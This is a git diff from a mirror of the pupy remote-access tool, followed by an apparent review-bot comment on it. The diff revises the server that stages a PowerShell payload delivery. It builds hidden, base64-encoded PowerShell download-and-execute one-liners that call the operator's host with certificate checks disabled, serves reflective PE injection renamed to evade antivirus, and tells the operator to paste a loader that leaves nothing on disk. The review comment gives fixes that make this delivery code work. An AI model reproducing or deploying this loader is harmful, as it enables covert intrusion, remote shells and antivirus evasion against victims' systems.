mirror of https://github.com/n1nj4sec/pupy.git
Merge branch 'master' of https://github.com/dc3l1ne/pupy into unstable
7e2d666c88
@ -1,6 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
# -*- coding: utf-8 -*-
|
# -*- coding: utf-8 -*-
|
||||||
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
|
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
|
||||||
|
from SocketServer import ThreadingMixIn
|
||||||
import os.path
|
import os.path
|
||||||
from pupylib.utils.term import colorize
|
from pupylib.utils.term import colorize
|
||||||
import random, string
|
import random, string
|
||||||
|
@ -86,20 +87,20 @@ class PupyPayloadHTTPHandler(BaseHTTPRequestHandler):
|
||||||
self.send_response(200)
|
self.send_response(200)
|
||||||
self.send_header('Content-type','text/html')
|
self.send_header('Content-type','text/html')
|
||||||
self.end_headers()
|
self.end_headers()
|
||||||
|
|
||||||
if self.server.useTargetProxy == True:
|
if self.server.useTargetProxy == True:
|
||||||
print colorize("[+] ","green")+"Stage 1 configured for using target's proxy configuration"
|
print colorize("[+] ","green")+"Stage 1 configured for using target's proxy configuration"
|
||||||
launcher = """IEX (New-Object Net.WebClient).DownloadString('http://{server}:{port}/{url_random_two}');""".format(
|
if not self.server.ssl:
|
||||||
server=self.server.link_ip,
|
launcher = "IEX (New-Object Net.WebClient).DownloadString('http://%s:%s/%s');"%(self.server.link_ip,self.server.link_port,url_random_two)
|
||||||
port=self.server.link_port,
|
else:
|
||||||
url_random_two=url_random_two
|
launcher = "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};IEX (New-Object Net.WebClient).DownloadString('https://%s:%s/%s');"%(self.server.link_ip,self.server.link_port,url_random_two)
|
||||||
)
|
|
||||||
else:
|
else:
|
||||||
print colorize("[+] ","green")+"Stage 1 configured for NOT using target's proxy configuration"
|
print colorize("[+] ","green")+"Stage 1 configured for NOT using target's proxy configuration"
|
||||||
launcher = """$w=(New-Object System.Net.WebClient);$w.Proxy=[System.Net.GlobalProxySelection]::GetEmptyWebProxy();iex($w.DownloadString('http://{server}:{port}/{url_random_two}'));""".format(
|
if not self.server.ssl:
|
||||||
server=self.server.link_ip,
|
launcher = "$w=(New-Object System.Net.WebClient);$w.Proxy=[System.Net.GlobalProxySelection]::GetEmptyWebProxy();IEX (New-Object Net.WebClient).DownloadString('http://%s:%s/%s');"%(self.server.link_ip,self.server.link_port,url_random_two)
|
||||||
port=self.server.link_port,
|
else:
|
||||||
url_random_two=url_random_two
|
launcher = "$w=(New-Object System.Net.WebClient);$w.Proxy=[System.Net.GlobalProxySelection]::GetEmptyWebProxy();[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};IEX (New-Object Net.WebClient).DownloadString('https://%s:%s/%s');"%(self.server.link_ip,self.server.link_port,url_random_two)
|
||||||
)
|
|
||||||
launcher = create_ps_command(launcher, force_ps32=True, nothidden=False)
|
launcher = create_ps_command(launcher, force_ps32=True, nothidden=False)
|
||||||
self.wfile.write(launcher)
|
self.wfile.write(launcher)
|
||||||
print colorize("[+] ","green")+"[Stage 1/2] Powershell script served !"
|
print colorize("[+] ","green")+"[Stage 1/2] Powershell script served !"
|
||||||
|
@ -112,31 +113,32 @@ class PupyPayloadHTTPHandler(BaseHTTPRequestHandler):
|
||||||
code=code.replace("Invoke-ReflectivePEInjection", self.server.random_reflectivepeinj_name) # seems to bypass some av like avast :o)
|
code=code.replace("Invoke-ReflectivePEInjection", self.server.random_reflectivepeinj_name) # seems to bypass some av like avast :o)
|
||||||
self.wfile.write(getInvokeReflectivePEInjectionWithDLLEmbedded(self.server.payload_conf))
|
self.wfile.write(getInvokeReflectivePEInjectionWithDLLEmbedded(self.server.payload_conf))
|
||||||
print colorize("[+] ","green")+"[Stage 2/2] Powershell Invoke-ReflectivePEInjection script (with dll embedded) served!"
|
print colorize("[+] ","green")+"[Stage 2/2] Powershell Invoke-ReflectivePEInjection script (with dll embedded) served!"
|
||||||
print colorize("[+] ","green")+"You should have a pupy shell in few seconds from this host..."
|
print colorize("[+] ","green")+colorize("%s:You should have a pupy shell in few seconds from this host..."%self.client_address[0],"green")
|
||||||
|
|
||||||
else:
|
else:
|
||||||
self.send_response(404)
|
self.send_response(404)
|
||||||
self.end_headers()
|
self.end_headers()
|
||||||
return
|
return
|
||||||
|
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
|
||||||
class ps1_HTTPServer(HTTPServer):
|
def set(self,conf, link_ip, port, ssl, useTargetProxy):
|
||||||
def __init__(self, server_address, conf, link_ip, link_port, ssl, useTargetProxy):
|
|
||||||
self.payload_conf = conf
|
self.payload_conf = conf
|
||||||
self.link_ip=link_ip
|
self.link_ip=link_ip
|
||||||
self.link_port=link_port
|
self.link_port=port
|
||||||
self.random_reflectivepeinj_name=''.join([random.choice(string.ascii_lowercase+string.ascii_uppercase+string.digits) for _ in range(0,random.randint(8,12))])
|
self.random_reflectivepeinj_name=''.join([random.choice(string.ascii_lowercase+string.ascii_uppercase+string.digits) for _ in range(0,random.randint(8,12))])
|
||||||
self.useTargetProxy = useTargetProxy
|
self.useTargetProxy = useTargetProxy
|
||||||
HTTPServer.__init__(self, server_address, PupyPayloadHTTPHandler)
|
|
||||||
if ssl:
|
if ssl:
|
||||||
|
self.ssl=ssl
|
||||||
config = PupyConfig()
|
config = PupyConfig()
|
||||||
|
config.read("pupy.conf")
|
||||||
keyfile=config.get("pupyd","keyfile").replace("\\",os.sep).replace("/",os.sep)
|
keyfile=config.get("pupyd","keyfile").replace("\\",os.sep).replace("/",os.sep)
|
||||||
certfile=config.get("pupyd","certfile").replace("\\",os.sep).replace("/",os.sep)
|
certfile=config.get("pupyd","certfile").replace("\\",os.sep).replace("/",os.sep)
|
||||||
self.socket = wrap_socket (self.socket, certfile=certfile, keyfile=keyfile, server_side=True)
|
self.socket = wrap_socket (self.socket, certfile=certfile, keyfile=keyfile, server_side=True)
|
||||||
|
|
||||||
def serve_ps1_payload(conf, ip="0.0.0.0", port=8080, link_ip="<your_ip>", ssl=False, useTargetProxy=True):
|
def serve_ps1_payload(conf, ip="0.0.0.0", port=8080, link_ip="<your_ip>", ssl=True, useTargetProxy=True):
|
||||||
try:
|
try:
|
||||||
try:
|
try:
|
||||||
server = ps1_HTTPServer((ip, port), conf, link_ip, port, ssl, useTargetProxy)
|
server = ThreadedHTTPServer((ip, port),PupyPayloadHTTPHandler)
|
||||||
|
server.set(conf, link_ip, port, ssl, useTargetProxy)
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
# [Errno 98] Adress already in use
|
# [Errno 98] Adress already in use
|
||||||
raise
|
raise
|
||||||
|
@ -144,11 +146,25 @@ def serve_ps1_payload(conf, ip="0.0.0.0", port=8080, link_ip="<your_ip>", ssl=Fa
|
||||||
print colorize("[+] ","green")+"copy/paste this one-line loader to deploy pupy without writing on the disk :"
|
print colorize("[+] ","green")+"copy/paste this one-line loader to deploy pupy without writing on the disk :"
|
||||||
print " --- "
|
print " --- "
|
||||||
if useTargetProxy == True:
|
if useTargetProxy == True:
|
||||||
oneliner=colorize("powershell.exe -w hidden -noni -nop -c \"iex(New-Object System.Net.WebClient).DownloadString('http://%s:%s/%s')\""%(link_ip, port, url_random_one), "green")
|
if not ssl:
|
||||||
|
a="iex(New-Object System.Net.WebClient).DownloadString('http://%s:%s/%s')"%(link_ip, port, url_random_one)
|
||||||
|
b=b64encode(a.encode('UTF-16LE'))
|
||||||
|
else:
|
||||||
|
a="[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};iex(New-Object System.Net.WebClient).DownloadString('https://%s:%s/%s')"%(link_ip, port, url_random_one)
|
||||||
|
b=b64encode(a.encode('UTF-16LE'))
|
||||||
|
oneliner=colorize("powershell.exe -w hidden -noni -nop -enc %s"%b, "green")
|
||||||
message=colorize("Please note that if the target's system uses a proxy, this previous powershell command will download/execute pupy through the proxy", "yellow")
|
message=colorize("Please note that if the target's system uses a proxy, this previous powershell command will download/execute pupy through the proxy", "yellow")
|
||||||
else:
|
else:
|
||||||
oneliner=colorize("powershell.exe -w hidden -noni -nop -c \"$w=(New-Object System.Net.WebClient);$w.Proxy=[System.Net.GlobalProxySelection]::GetEmptyWebProxy();iex($w.DownloadString('http://%s:%s/%s'));\""%(link_ip, port, url_random_one), "green")
|
if not ssl:
|
||||||
|
a="$w=(New-Object System.Net.WebClient);$w.Proxy=[System.Net.GlobalProxySelection]::GetEmptyWebProxy();iex(New-Object System.Net.WebClient).DownloadString('http://%s:%s/%s')"%(link_ip, port, url_random_one)
|
||||||
|
b=b64encode(a.encode('UTF-16LE'))
|
||||||
|
else:
|
||||||
|
a="$w=(New-Object System.Net.WebClient);$w.Proxy=[System.Net.GlobalProxySelection]::GetEmptyWebProxy();[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};iex(New-Object System.Net.WebClient).DownloadString('https://%s:%s/%s')"%(link_ip, port, url_random_one)
|
||||||
|
b=b64encode(a.encode('UTF-16LE'))
|
||||||
|
oneliner=colorize("powershell.exe -w hidden -noni -nop -enc %s"%b, "green")
|
||||||
message= colorize("Please note that even if the target's system uses a proxy, this previous powershell command will not use the proxy for downloading pupy", "yellow")
|
message= colorize("Please note that even if the target's system uses a proxy, this previous powershell command will not use the proxy for downloading pupy", "yellow")
|
||||||
|
print colorize("powershell.exe -w hidden -noni -nop -enc %s"%a, "green")
|
||||||
|
print " --- "
|
||||||
print oneliner
|
print oneliner
|
||||||
print " --- "
|
print " --- "
|
||||||
print message
|
print message
|
||||||
|
|
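Review bot: `self.ssl` is only assigned inside the `if ssl:` block of the new `ThreadedHTTPServer.set`, but the new branches in the handler (`if not self.server.ssl:` in both the proxy and no-proxy paths of the second hunk) read `self.server.ssl` unconditionally, so with `serve_ps1_payload(..., ssl=False)` every request fails with AttributeError instead of serving the plain-http stage. Move the assignment above the conditional: `self.ssl=ssl` as the first line after `self.useTargetProxy = useTargetProxy`, leaving the `if ssl:` block to do only the keyfile/certfile lookup and `wrap_socket`. The handler method whose body the second hunk edits starts outside the hunk, as does the `serve_ps1_payload` body in the last hunk. In that last hunk the added `print colorize("powershell.exe -w hidden -noni -nop -enc %s"%a, "green")` interpolates the raw script `a` rather than the base64 `b` and duplicates the `oneliner` printed three lines later; it reads as leftover debugging and should be removed. Whether `b64encode` is imported elsewhere in the file cannot be seen from these hunks (the first hunk shows only the first seven lines), so confirm it is in scope before merging.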